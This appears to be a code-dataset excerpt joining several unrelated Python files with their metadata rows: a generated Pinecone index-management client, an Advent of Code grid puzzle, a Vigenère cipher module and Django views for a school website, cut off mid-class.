This operation creates a Pinecone index. You can use it to specify the measure of similarity, the dimension of vectors to be stored in the index, the numbers of shards and replicas to use, and more. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.create_index(async_req=True)
>>> result = thread.get()
Keyword Args:
create_request (CreateRequest): [optional]
_return_http_data_only (bool): response data without head status
code and headers. Default is True.
_preload_content (bool): if False, the urllib3.HTTPResponse object
will be returned without reading/decoding response data.
Default is True.
_request_timeout (int/float/tuple): timeout setting for this request. If
one number provided, it will be total request timeout. It can also
be a pair (tuple) of (connection, read) timeouts.
Default is None.
_check_input_type (bool): specifies if type checking
should be done one the data sent to the server.
Default is True.
_check_return_type (bool): specifies if type checking
should be done one the data received from the server.
Default is True.
_host_index (int/None): specifies the index of the server
that we want to use.
Default is read from the configuration.
async_req (bool): execute request asynchronously
Returns:
str
If the method is called asynchronously, returns the request
thread.
"""
kwargs['async_req'] = kwargs.get(
'async_req', False
)
kwargs['_return_http_data_only'] = kwargs.get(
'_return_http_data_only', True
)
kwargs['_preload_content'] = kwargs.get(
'_preload_content', True
)
kwargs['_request_timeout'] = kwargs.get(
'_request_timeout', None
)
kwargs['_check_input_type'] = kwargs.get(
'_check_input_type', True
)
kwargs['_check_return_type'] = kwargs.get(
'_check_return_type', True
)
kwargs['_host_index'] = kwargs.get('_host_index')
return self.call_with_http_info(**kwargs)
self.create_index = _Endpoint(
settings={
'response_type': (str,),
'auth': [
'ApiKeyAuth'
],
'endpoint_path': '/databases',
'operation_id': 'create_index',
'http_method': 'POST',
'servers': [
{
'url': "https://controller.{environment}.pinecone.io",
'description': "No description provided",
'variables': {
'environment': {
'description': "No description provided",
'default_value': "unknown",
}
}
},
]
},
params_map={
'all': [
'create_request',
],
'required': [],
'nullable': [
],
'enum': [
],
'validation': [
]
},
root_map={
'validations': {
},
'allowed_values': {
},
'openapi_types': {
'create_request':
(CreateRequest,),
},
'attribute_map': {
},
'location_map': {
'create_request': 'body',
},
'collection_format_map': {
}
},
headers_map={
'accept': [
'text/plain'
],
'content_type': [
'application/json'
]
},
api_client=api_client,
callable=__create_index
)
def __delete_index(
self,
index_name,
**kwargs
):
"""delete_index # noqa: E501
This operation deletes an existing index. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.delete_index(index_name, async_req=True)
>>> result = thread.get()
Args:
index_name (str): The name of the index
Keyword Args:
_return_http_data_only (bool): response data without head status
code and headers. Default is True.
_preload_content (bool): if False, the urllib3.HTTPResponse object
will be returned without reading/decoding response data.
Default is True.
_request_timeout (int/float/tuple): timeout setting for this request. If
one number provided, it will be total request timeout. It can also
be a pair (tuple) of (connection, read) timeouts.
Default is None.
_check_input_type (bool): specifies if type checking
should be done one the data sent to the server.
Default is True.
_check_return_type (bool): specifies if type checking
should be done one the data received from the server.
Default is True.
_host_index (int/None): specifies the index of the server
that we want to use.
Default is read from the configuration.
async_req (bool): execute request asynchronously
Returns:
str
If the method is called asynchronously, returns the request
thread.
"""
kwargs['async_req'] = kwargs.get(
'async_req', False
)
kwargs['_return_http_data_only'] = kwargs.get(
'_return_http_data_only', True
)
kwargs['_preload_content'] = kwargs.get(
'_preload_content', True
)
kwargs['_request_timeout'] = kwargs.get(
'_request_timeout', None
)
kwargs['_check_input_type'] = kwargs.get(
'_check_input_type', True
)
kwargs['_check_return_type'] = kwargs.get(
'_check_return_type', True
)
kwargs['_host_index'] = kwargs.get('_host_index')
kwargs['index_name'] = \
index_name
return self.call_with_http_info(**kwargs)
self.delete_index = _Endpoint(
settings={
'response_type': (str,),
'auth': [
'ApiKeyAuth'
],
'endpoint_path': '/databases/{indexName}',
'operation_id': 'delete_index',
'http_method': 'DELETE',
'servers': [
{
'url': "https://controller.{environment}.pinecone.io",
'description': "No description provided",
'variables': {
'environment': {
'description': "No description provided",
'default_value': "unknown",
}
}
},
]
},
params_map={
'all': [
'index_name',
],
'required': [
'index_name',
],
'nullable': [
],
'enum': [
],
'validation': [
]
},
root_map={
'validations': {
},
'allowed_values': {
},
'openapi_types': {
'index_name':
(str,),
},
'attribute_map': {
'index_name': 'indexName',
},
'location_map': {
'index_name': 'path',
},
'collection_format_map': {
}
},
headers_map={
'accept': [
'text/plain'
],
'content_type': [],
},
api_client=api_client,
callable=__delete_index
)
def __describe_index(
self,
index_name,
**kwargs
):
"""describe_index # noqa: E501
Get a description of an index. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.describe_index(index_name, async_req=True)
>>> result = thread.get()
Args:
index_name (str): The name of the index
Keyword Args:
_return_http_data_only (bool): response data without head status
code and headers. Default is True.
_preload_content (bool): if False, the urllib3.HTTPResponse object
will be returned without reading/decoding response data.
Default is True.
_request_timeout (int/float/tuple): timeout setting for this request. If
one number provided, it will be total request timeout. It can also
be a pair (tuple) of (connection, read) timeouts.
Default is None.
_check_input_type (bool): specifies if type checking
should be done one the data sent to the server.
Default is True.
_check_return_type (bool): specifies if type checking
should be done one the data received from the server.
Default is True.
_host_index (int/None): specifies the index of the server
that we want to use.
Default is read from the configuration.
async_req (bool): execute request asynchronously
Returns:
IndexMeta
If the method is called asynchronously, returns the request
thread.
"""
kwargs['async_req'] = kwargs.get(
'async_req', False
)
kwargs['_return_http_data_only'] = kwargs.get(
'_return_http_data_only', True
)
kwargs['_preload_content'] = kwargs.get(
'_preload_content', True
)
kwargs['_request_timeout'] = kwargs.get(
'_request_timeout', None
)
kwargs['_check_input_type'] = kwargs.get(
'_check_input_type', True
)
kwargs['_check_return_type'] = kwargs.get(
'_check_return_type', True
)
kwargs['_host_index'] = kwargs.get('_host_index')
kwargs['index_name'] = \
index_name
return self.call_with_http_info(**kwargs)
self.describe_index = _Endpoint(
settings={
'response_type': (IndexMeta,),
'auth': [
'ApiKeyAuth'
],
'endpoint_path': '/databases/{indexName}',
'operation_id': 'describe_index',
'http_method': 'GET',
'servers': [
{
'url': "https://controller.{environment}.pinecone.io",
'description': "No description provided",
'variables': {
'environment': {
'description': "No description provided",
'default_value': "unknown",
}
}
},
]
},
params_map={
'all': [
'index_name',
],
'required': [
'index_name',
],
'nullable': [
],
'enum': [
],
'validation': [
]
},
root_map={
'validations': {
},
'allowed_values': {
},
'openapi_types': {
'index_name':
(str,),
},
'attribute_map': {
'index_name': 'indexName',
},
'location_map': {
'index_name': 'path',
},
'collection_format_map': {
}
},
headers_map={
'accept': [
'application/json'
],
'content_type': [],
},
api_client=api_client,
callable=__describe_index
)
def __list_indexes(
self,
**kwargs
):
"""list_indexes # noqa: E501
This operation returns a list of your Pinecone indexes. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.list_indexes(async_req=True)
>>> result = thread.get()
Keyword Args:
_return_http_data_only (bool): response data without head status
code and headers. Default is True.
_preload_content (bool): if False, the urllib3.HTTPResponse object
will be returned without reading/decoding response data.
Default is True.
_request_timeout (int/float/tuple): timeout setting for this request. If
one number provided, it will be total request timeout. It can also
be a pair (tuple) of (connection, read) timeouts.
Default is None.
_check_input_type (bool): specifies if type checking
should be done one the data sent to the server.
Default is True.
_check_return_type (bool): specifies if type checking
should be done one the data received from the server.
Default is True.
_host_index (int/None): specifies the index of the server
that we want to use.
Default is read from the configuration.
async_req (bool): execute request asynchronously
Returns:
[str]
If the method is called asynchronously, returns the request
thread.
"""
kwargs['async_req'] = kwargs.get(
'async_req', False
)
kwargs['_return_http_data_only'] = kwargs.get(
'_return_http_data_only', True
)
kwargs['_preload_content'] = kwargs.get(
'_preload_content', True
)
kwargs['_request_timeout'] = kwargs.get(
'_request_timeout', None
)
kwargs['_check_input_type'] = kwargs.get(
'_check_input_type', True
)
kwargs['_check_return_type'] = kwargs.get(
'_check_return_type', True
)
kwargs['_host_index'] = kwargs.get('_host_index')
return self.call_with_http_info(**kwargs)
self.list_indexes = _Endpoint(
settings={
'response_type': ([str],),
'auth': [
'ApiKeyAuth'
],
'endpoint_path': '/databases',
'operation_id': 'list_indexes',
'http_method': 'GET',
'servers': [
{
'url': "https://controller.{environment}.pinecone.io",
'description': "No description provided",
'variables': {
'environment': {
'description': "No description provided",
'default_value': "unknown",
}
}
},
]
},
params_map={
'all': [
],
'required': [],
'nullable': [
],
'enum': [
],
'validation': [
]
},
root_map={
'validations': {
},
'allowed_values': {
},
'openapi_types': {
},
'attribute_map': {
},
'location_map': {
},
'collection_format_map': {
}
},
headers_map={
'accept': [
'application/json; charset=utf-8'
],
'content_type': [],
},
api_client=api_client,
callable=__list_indexes
)
def __scale_index(
self,
index_name,
**kwargs
):
"""scale_index # noqa: E501
This operation increases or decreases the number of replicas in an index. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.scale_index(index_name, async_req=True)
>>> result = thread.get()
Args:
index_name (str): The name of the index
Keyword Args:
patch_request (PatchRequest): The number of replicas. [optional]
_return_http_data_only (bool): response data without head status
code and headers. Default is True.
_preload_content (bool): if False, the urllib3.HTTPResponse object
will be returned without reading/decoding response data.
Default is True.
_request_timeout (int/float/tuple): timeout setting for this request. If
one number provided, it will be total request timeout. It can also
be a pair (tuple) of (connection, read) timeouts.
Default is None.
_check_input_type (bool): specifies if type checking
should be done one the data sent to the server.
Default is True.
_check_return_type (bool): specifies if type checking
should be done one the data received from the server.
Default is True.
_host_index (int/None): specifies the index of the server
that we want to use.
Default is read from the configuration.
async_req (bool): execute request asynchronously
Returns:
str
If the method is called asynchronously, returns the request
thread.
"""
kwargs['async_req'] = kwargs.get(
'async_req', False
)
kwargs['_return_http_data_only'] = kwargs.get(
'_return_http_data_only', True
)
kwargs['_preload_content'] = kwargs.get(
'_preload_content', True
)
kwargs['_request_timeout'] = kwargs.get(
'_request_timeout', None
)
kwargs['_check_input_type'] = kwargs.get(
'_check_input_type', True
)
kwargs['_check_return_type'] = kwargs.get(
'_check_return_type', True
)
kwargs['_host_index'] = kwargs.get('_host_index')
kwargs['index_name'] = \
index_name
return self.call_with_http_info(**kwargs)
self.scale_index = _Endpoint(
settings={
'response_type': (str,),
'auth': [
'ApiKeyAuth'
],
'endpoint_path': '/databases/{indexName}',
'operation_id': 'scale_index',
'http_method': 'PATCH',
'servers': [
{
'url': "https://controller.{environment}.pinecone.io",
'description': "No description provided",
'variables': {
'environment': {
'description': "No description provided",
'default_value': "unknown",
}
}
},
]
},
params_map={
'all': [
'index_name',
'patch_request',
],
'required': [
'index_name',
],
'nullable': [
],
'enum': [
],
'validation': [
]
},
root_map={
'validations': {
},
'allowed_values': {
},
'openapi_types': {
'index_name':
(str,),
'patch_request':
(PatchRequest,),
},
'attribute_map': {
'index_name': 'indexName',
},
'location_map': {
'index_name': 'path',
'patch_request': 'body',
},
'collection_format_map': {
}
},
headers_map={
'accept': [
'text/plain'
],
'content_type': [
'application/json'
]
},
api_client=api_client,
callable=__scale_index
)
| 36.378102 | 224 | 0.448172 | 2,053 | 24,919 | 5.205553 | 0.109109 | 0.029475 | 0.024329 | 0.025264 | 0.848133 | 0.820904 | 0.820904 | 0.811547 | 0.794236 | 0.794236 | 0 | 0.00424 | 0.470003 | 24,919 | 684 | 225 | 36.431287 | 0.804952 | 0.316666 | 0 | 0.62987 | 1 | 0 | 0.230882 | 0.025978 | 0 | 0 | 0 | 0 | 0 | 1 | 0.012987 | false | 0 | 0.015152 | 0 | 0.041126 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
19bb002a3c3b684a4a97b41ae84683042c527539 | 75 | py | Python | scopus/classes/__init__.py | crew102/scopus | d8791c162cef4c2f830d983b435333d9d8eaf472 | [
"MIT"
] | null | null | null | scopus/classes/__init__.py | crew102/scopus | d8791c162cef4c2f830d983b435333d9d8eaf472 | [
"MIT"
] | null | null | null | scopus/classes/__init__.py | crew102/scopus | d8791c162cef4c2f830d983b435333d9d8eaf472 | [
"MIT"
] | null | null | null | from scopus.classes.retrieval import *
from scopus.classes.search import *
| 25 | 38 | 0.813333 | 10 | 75 | 6.1 | 0.6 | 0.327869 | 0.557377 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.106667 | 75 | 2 | 39 | 37.5 | 0.910448 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 7 |
19e9c98c107c00cdc28b4ddcfa6d7e9750fdc735 | 1,436 | py | Python | d18.py | f-koehler/adventofcode | b1f5f36b64e1e0e9decc3a3941cf207096d0102e | [
"MIT"
] | 1 | 2020-07-01T16:10:06.000Z | 2020-07-01T16:10:06.000Z | d18.py | f-koehler/adventofcode | b1f5f36b64e1e0e9decc3a3941cf207096d0102e | [
"MIT"
] | null | null | null | d18.py | f-koehler/adventofcode | b1f5f36b64e1e0e9decc3a3941cf207096d0102e | [
"MIT"
] | null | null | null | #!/bin/env python3
with open("d18.txt") as f:
lines = f.read().splitlines()
dim_x = len(lines)
dim_y = len(lines[0])
lights = {
(x, y) for y, l in enumerate(lines)
for x, c in enumerate(l)
if c == "#"
}
def active_neighbours(x, y):
return sum(
(x_n, y_n) in lights
for x_n in (x-1, x, x+1)
for y_n in (y-1, y, y+1)
if (x_n, y_n) != (x, y)
)
for i in range(100):
lights = {
(x, y)
for x in range(dim_x)
for y in range(dim_y)
if (((x, y) in lights) and (2 <= active_neighbours(x, y) <= 3)) or
(((x, y) not in lights) and (active_neighbours(x, y) == 3))
}
print(len(lights))
# part 2
corners = {(0, 0), (0, dim_y-1), (dim_x-1, 0), (dim_x-1, dim_y-1)}
lights = corners | {
(x, y) for y, l in enumerate(lines)
for x, c in enumerate(l)
if c == "#"
}
def active_neighbours(x, y):
return sum(
(x_n, y_n) in lights
for x_n in (x-1, x, x+1)
for y_n in (y-1, y, y+1)
if (x_n, y_n) != (x, y)
)
for i in range(100):
lights = corners | {
(x, y)
for x in range(dim_x)
for y in range(dim_y)
if (((x, y) in lights) and (2 <= active_neighbours(x, y) <= 3)) or
(((x, y) not in lights) and (active_neighbours(x, y) == 3))
}
print(len(lights))
| 22.793651 | 78 | 0.470056 | 247 | 1,436 | 2.619433 | 0.17004 | 0.049459 | 0.046368 | 0.166924 | 0.819165 | 0.788253 | 0.788253 | 0.788253 | 0.788253 | 0.788253 | 0 | 0.036224 | 0.365599 | 1,436 | 62 | 79 | 23.16129 | 0.673985 | 0.016713 | 0 | 0.765957 | 0 | 0 | 0.006383 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.042553 | false | 0 | 0 | 0.042553 | 0.085106 | 0.042553 | 0 | 0 | 0 | null | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 8 |
c24566e501b70d71fab3c9d1a132d2f0482d0d78 | 1,769 | py | Python | ee250/archive/lab10/vigenere.py | usc-ee250-spring2021/lab02-haotianxu2021 | 40b49ad313e7f7d12e1881507e0314b8dfac34f4 | [
"MIT"
] | 4 | 2022-01-21T00:18:37.000Z | 2022-02-09T07:29:08.000Z | ee250/archive/lab10/vigenere.py | dfbrione/GrovePi-EE250 | 1be1f20f03d0f9da3f732db7777eb72b7da6ed9f | [
"MIT"
] | null | null | null | ee250/archive/lab10/vigenere.py | dfbrione/GrovePi-EE250 | 1be1f20f03d0f9da3f732db7777eb72b7da6ed9f | [
"MIT"
] | 38 | 2020-08-24T23:05:49.000Z | 2021-01-28T05:47:28.000Z | def encrypt(phrase, key):
assert isinstance(phrase, str) and isinstance(key, str)
key = key.lower()
phrase = phrase.lower()
new_phrase = ''
key_idx = 0
# increment through the characters of the phrase
for i in range(len(phrase)):
# if it is a letter of the alphabet encode it
if phrase[i].isalpha():
# converting letters to what number letter they are in the alphabet
key_char_num = ord(key[key_idx]) - ord('a')
phrase_char_num = ord(phrase[i]) - ord('a')
# add the current key character to the current phrase character
new_phrase_char_num = (phrase_char_num + key_char_num) % 26
# convert the number into the new character
new_phrase += chr(new_phrase_char_num + ord('a'))
# increment the key
key_idx = (key_idx + 1) % len(key)
# if it is not a letter of the alphabet, leave it alone
else:
new_phrase += phrase[i]
return new_phrase
def decrypt(phrase, key):
assert isinstance(phrase, str) and isinstance(key, str)
key = key.lower()
phrase = phrase.lower()
new_phrase = ''
key_idx = 0
# increment through the characters of the phrase
for i in range(len(phrase)):
# if it is a letter of the alphabet encode it
if phrase[i].isalpha():
# converting letters to what number letter they are in the alphabet
key_char_num = ord(key[key_idx]) - ord('a')
phrase_char_num = ord(phrase[i]) - ord('a')
# subtract the current key character to the current phrase character
new_phrase_char_num = (phrase_char_num - key_char_num) % 26
# convert the number into the new character
new_phrase += chr(new_phrase_char_num + ord('a'))
# increment the key
key_idx = (key_idx + 1) % len(key)
# if it is not a letter of the alphabet, leave it alone
else:
new_phrase += phrase[i]
return new_phrase
| 34.019231 | 71 | 0.700396 | 290 | 1,769 | 4.12069 | 0.189655 | 0.090377 | 0.087029 | 0.040167 | 0.974059 | 0.974059 | 0.974059 | 0.974059 | 0.974059 | 0.974059 | 0 | 0.005662 | 0.201244 | 1,769 | 51 | 72 | 34.686275 | 0.840057 | 0.378745 | 0 | 0.875 | 0 | 0 | 0.005535 | 0 | 0 | 0 | 0 | 0 | 0.0625 | 1 | 0.0625 | false | 0 | 0 | 0 | 0.125 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
dfd044712049d35fcd4ddf11118f4ff775035642 | 23,812 | py | Python | websitesetting/views.py | masoodazhar/-school-management-system | 6525b3d29d12f03e05d362d81b7c5855806f57d9 | [
"Apache-2.0"
] | 1 | 2022-01-20T10:20:05.000Z | 2022-01-20T10:20:05.000Z | websitesetting/views.py | masoodazhar/-school-management-system | 6525b3d29d12f03e05d362d81b7c5855806f57d9 | [
"Apache-2.0"
] | null | null | null | websitesetting/views.py | masoodazhar/-school-management-system | 6525b3d29d12f03e05d362d81b7c5855806f57d9 | [
"Apache-2.0"
] | 1 | 2022-01-20T10:20:31.000Z | 2022-01-20T10:20:31.000Z | from django.shortcuts import render
from django.views.generic import CreateView, UpdateView, DeleteView, ListView, TemplateView
from .models import Slider, StudentActivities, About, SchoolSummery,Gallery, NoticeBoard, ExtraCources, Events, RegisterNow, RegisteredStudent
from payroll.models import Teacher
from django.contrib.auth.mixins import PermissionRequiredMixin
from home.decorators import allowed_users
from django.contrib.auth.decorators import login_required
from django.contrib.messages.views import SuccessMessageMixin
from django import forms
from django.http import JsonResponse
import datetime
# Create your views here.
# User, Client section
def websitesettinghome(request):
return render(request, 'websitesetting/index.html')
class RegisteredStudentForm(forms.ModelForm):
class Meta:
model = RegisteredStudent
fields = '__all__'
def registerstudent(request):
rs = RegisterNow.objects.filter(pk__lt=2).first()
rs = str(rs.end_date).split('-')
form = RegisteredStudentForm(request.POST)
if form.is_valid():
if datetime.date(int(rs[0]), int(rs[1]), int(rs[2])) > datetime.date.today():
form.save()
else:
return JsonResponse({'status': 'ok', 'message': 'Time has been finished. Try next time'})
return JsonResponse({'status': 'ok', 'message': 'Request has been Registered Successfully!'})
else:
return JsonResponse({'status': 'error', 'message': form.errors})
def register_request(request):
registeredstudents = RegisteredStudent.objects.all()
context = {
'registeredstudents': registeredstudents
}
return render(request, 'websitesetting/registered_students_list.html', context)
class SliderCreate(SuccessMessageMixin, CreateView):
model = Slider
fields = ['header','detail','redirect_link','back_image']
template_name = 'websitesetting/sliders.html'
success_url = '/website_setting/sliders/'
success_message = 'Slider Has Been Saved!'
def form_valid(self, form):
if self.request.user.is_staff:
module_holder = self.request.user.username
else:
this_holder = Teacher.objects.get(user_ptr_id=self.request.user.id)
module_holder = this_holder.module_holder
form.instance.module_holder = module_holder
form = super().form_valid(form)
return form
def get_context_data(self, **kwargs):
if self.request.user.is_staff:
module_holder = self.request.user.username
else:
this_holder = Teacher.objects.get(user_ptr_id=self.request.user.id)
module_holder = this_holder.module_holder
context = super(SliderCreate, self).get_context_data(**kwargs)
context['sliders'] = Slider.objects.filter(module_holder=module_holder)
return context
class SliderUpdate(SuccessMessageMixin, UpdateView):
model = Slider
fields = ['header','detail','redirect_link','back_image']
template_name = 'websitesetting/sliders.html'
success_url = '/website_setting/sliders/'
success_message = 'Slider has been updated!'
def form_valid(self, form):
if self.request.user.is_staff:
module_holder = self.request.user.username
else:
this_holder = Teacher.objects.get(user_ptr_id=self.request.user.id)
module_holder = this_holder.module_holder
form.instance.module_holder = module_holder
form = super().form_valid(form)
return form
def get_context_data(self, **kwargs):
if self.request.user.is_staff:
module_holder = self.request.user.username
else:
this_holder = Teacher.objects.get(user_ptr_id=self.request.user.id)
module_holder = this_holder.module_holder
context = super(SliderUpdate, self).get_context_data(**kwargs)
context['sliders'] = Slider.objects.filter(module_holder=module_holder)
return context
class SliderDelete(SuccessMessageMixin, DeleteView):
model = Slider
success_message = 'Data has been deleted!'
success_url = '/website_setting/sliders/'
# STUDENT ACTIVITIES
class StudentActivitiesCreate(SuccessMessageMixin, ListView):
model = StudentActivities
fields = ['name','image','description']
template_name = 'websitesetting/studentactivities.html'
def get_context_data(self, **kwargs):
if self.request.user.is_staff:
module_holder = self.request.user.username
else:
this_holder = Teacher.objects.get(user_ptr_id=self.request.user.id)
module_holder = this_holder.module_holder
context = super(StudentActivitiesCreate, self).get_context_data(**kwargs)
context['studentsactivities'] = StudentActivities.objects.filter(module_holder=module_holder)
return context
class StudentActivitiesUpdate(SuccessMessageMixin, UpdateView):
model = StudentActivities
fields = ['name','image','description']
template_name = 'websitesetting/studentactivities_update.html'
success_url = '/website_setting/studentactivities/'
success_message = 'Student activity has been updated!'
def form_valid(self, form):
if self.request.user.is_staff:
module_holder = self.request.user.username
else:
this_holder = Teacher.objects.get(user_ptr_id=self.request.user.id)
module_holder = this_holder.module_holder
form.instance.module_holder = module_holder
form = super().form_valid(form)
return form
def get_context_data(self, **kwargs):
if self.request.user.is_staff:
module_holder = self.request.user.username
else:
this_holder = Teacher.objects.get(user_ptr_id=self.request.user.id)
module_holder = this_holder.module_holder
context = super(StudentActivitiesUpdate, self).get_context_data(**kwargs)
context['studentsactivities'] = StudentActivities.objects.filter(module_holder=module_holder)
return context
# School details videos
class SchoolSummeryList(SuccessMessageMixin, ListView):
model = SchoolSummery
fields = ['heading','thumbnail','youtube_link','description']
template_name = 'websitesetting/summery_list.html'
def get_context_data(self, **kwargs):
if self.request.user.is_staff:
module_holder = self.request.user.username
else:
this_holder = Teacher.objects.get(user_ptr_id=self.request.user.id)
module_holder = this_holder.module_holder
context = super(SchoolSummeryList, self).get_context_data(**kwargs)
context['schoolsummery'] = SchoolSummery.objects.filter(module_holder=module_holder)
return context
class SchoolSummeryUpdate(SuccessMessageMixin, UpdateView):
model = SchoolSummery
fields = ['heading','thumbnail','youtube_link','description']
template_name = 'websitesetting/summery_update.html'
success_url = '/website_setting/summeryactivity/'
success_message = 'Summery activity has been updated!'
def form_valid(self, form):
if self.request.user.is_staff:
module_holder = self.request.user.username
else:
this_holder = Teacher.objects.get(user_ptr_id=self.request.user.id)
module_holder = this_holder.module_holder
form.instance.module_holder = module_holder
form = super().form_valid(form)
return form
def get_context_data(self, **kwargs):
if self.request.user.is_staff:
module_holder = self.request.user.username
else:
this_holder = Teacher.objects.get(user_ptr_id=self.request.user.id)
module_holder = this_holder.module_holder
context = super(SchoolSummeryUpdate, self).get_context_data(**kwargs)
context['schoolsummery'] = SchoolSummery.objects.filter(module_holder=module_holder)
return context
# School About
class AboutList(SuccessMessageMixin, ListView):
model = About
fields = ['about_heading','about_description','about_background']
template_name = 'websitesetting/about.html'
def get_context_data(self, **kwargs):
if self.request.user.is_staff:
module_holder = self.request.user.username
else:
this_holder = Teacher.objects.get(user_ptr_id=self.request.user.id)
module_holder = this_holder.module_holder
context = super(AboutList, self).get_context_data(**kwargs)
context['about'] = About.objects.filter(module_holder=module_holder)
return context
class AboutUpdate(SuccessMessageMixin, UpdateView):
model = About
fields = ['about_heading','about_description','about_background']
template_name = 'websitesetting/about-edit.html'
success_url = '/website_setting/about/'
success_message = 'About has been updated!'
def form_valid(self, form):
if self.request.user.is_staff:
module_holder = self.request.user.username
else:
this_holder = Teacher.objects.get(user_ptr_id=self.request.user.id)
module_holder = this_holder.module_holder
form.instance.module_holder = module_holder
form = super().form_valid(form)
return form
def get_context_data(self, **kwargs):
if self.request.user.is_staff:
module_holder = self.request.user.username
else:
this_holder = Teacher.objects.get(user_ptr_id=self.request.user.id)
module_holder = this_holder.module_holder
context = super(AboutUpdate, self).get_context_data(**kwargs)
context['about'] = About.objects.filter(module_holder=module_holder)
return context
# School details videos
class RegisterNowList(SuccessMessageMixin, ListView):
model = RegisterNow
fields = ['heading','end_date']
template_name = 'websitesetting/registernow.html'
def get_context_data(self, **kwargs):
if self.request.user.is_staff:
module_holder = self.request.user.username
else:
this_holder = Teacher.objects.get(user_ptr_id=self.request.user.id)
module_holder = this_holder.module_holder
context = super(RegisterNowList, self).get_context_data(**kwargs)
context['registernow'] = RegisterNow.objects.filter(module_holder=module_holder)
return context
class RegisterNowUpdate(SuccessMessageMixin, UpdateView):
model = RegisterNow
fields = ['heading','end_date']
template_name = 'websitesetting/registernow_update.html'
success_url = '/website_setting/registernow/'
success_message = '(Register Now) has been updated!'
def form_valid(self, form):
if self.request.user.is_staff:
module_holder = self.request.user.username
else:
this_holder = Teacher.objects.get(user_ptr_id=self.request.user.id)
module_holder = this_holder.module_holder
form.instance.module_holder = module_holder
form = super().form_valid(form)
return form
def get_form(self, **kwargs):
form = super(RegisterNowUpdate, self).get_form(**kwargs)
form.fields['end_date'] = forms.CharField(widget=forms.TextInput(attrs={'type': 'date'}))
return form
def get_context_data(self, **kwargs):
if self.request.user.is_staff:
module_holder = self.request.user.username
else:
this_holder = Teacher.objects.get(user_ptr_id=self.request.user.id)
module_holder = this_holder.module_holder
context = super(RegisterNowUpdate, self).get_context_data(**kwargs)
context['registernow'] = RegisterNow.objects.filter(module_holder=module_holder)
return context
# Extra Cources Details
class ExtraCourcesCreate(SuccessMessageMixin, CreateView):
model = ExtraCources
fields = ['name','image','price','faculty','description']
template_name = 'websitesetting/extra_cources.html'
success_url = '/website_setting/extracources/'
success_message = 'Extra Course Has Been Saved!'
def form_valid(self, form):
if self.request.user.is_staff:
module_holder = self.request.user.username
else:
this_holder = Teacher.objects.get(user_ptr_id=self.request.user.id)
module_holder = this_holder.module_holder
form.instance.module_holder = module_holder
form = super().form_valid(form)
return form
def get_context_data(self, **kwargs):
if self.request.user.is_staff:
module_holder = self.request.user.username
else:
this_holder = Teacher.objects.get(user_ptr_id=self.request.user.id)
module_holder = this_holder.module_holder
context = super(ExtraCourcesCreate, self).get_context_data(**kwargs)
context['extracources'] = ExtraCources.objects.filter(module_holder=module_holder)
return context
class ExtraCourcesUpdate(SuccessMessageMixin, UpdateView):
model = ExtraCources
fields = ['name','image','price','faculty','description']
template_name = 'websitesetting/extra_cources.html'
success_url = '/website_setting/extracources/'
success_message = 'Extra Course has been updated!'
def form_valid(self, form):
if self.request.user.is_staff:
module_holder = self.request.user.username
else:
this_holder = Teacher.objects.get(user_ptr_id=self.request.user.id)
module_holder = this_holder.module_holder
form.instance.module_holder = module_holder
form = super().form_valid(form)
return form
def get_context_data(self, **kwargs):
if self.request.user.is_staff:
module_holder = self.request.user.username
else:
this_holder = Teacher.objects.get(user_ptr_id=self.request.user.id)
module_holder = this_holder.module_holder
context = super(ExtraCourcesUpdate, self).get_context_data(**kwargs)
context['extracources'] = ExtraCources.objects.filter(module_holder=module_holder)
return context
class ExtraCourcesDelete(SuccessMessageMixin, DeleteView):
model = ExtraCources
success_message = 'Extra Course has been deleted!'
success_url = '/website_setting/extracources/'
# Extra Gallery
class GalleryCreate(SuccessMessageMixin, CreateView):
model = Gallery
fields = ['heading','image']
template_name = 'websitesetting/gallery.html'
success_url = '/website_setting/gallery/'
success_message = 'Image Has Been Saved!'
def form_valid(self, form):
if self.request.user.is_staff:
module_holder = self.request.user.username
else:
this_holder = Teacher.objects.get(user_ptr_id=self.request.user.id)
module_holder = this_holder.module_holder
form.instance.module_holder = module_holder
form = super().form_valid(form)
return form
def form_invalid(self, form):
form = super().form_invalid(form)
return form
def get_context_data(self, **kwargs):
if self.request.user.is_staff:
module_holder = self.request.user.username
else:
this_holder = Teacher.objects.get(user_ptr_id=self.request.user.id)
module_holder = this_holder.module_holder
context = super(GalleryCreate, self).get_context_data(**kwargs)
context['gallery'] = Gallery.objects.filter(module_holder=module_holder)
return context
class GalleryUpdate(SuccessMessageMixin, UpdateView):
model = Gallery
fields = ['heading','image']
template_name = 'websitesetting/gallery.html'
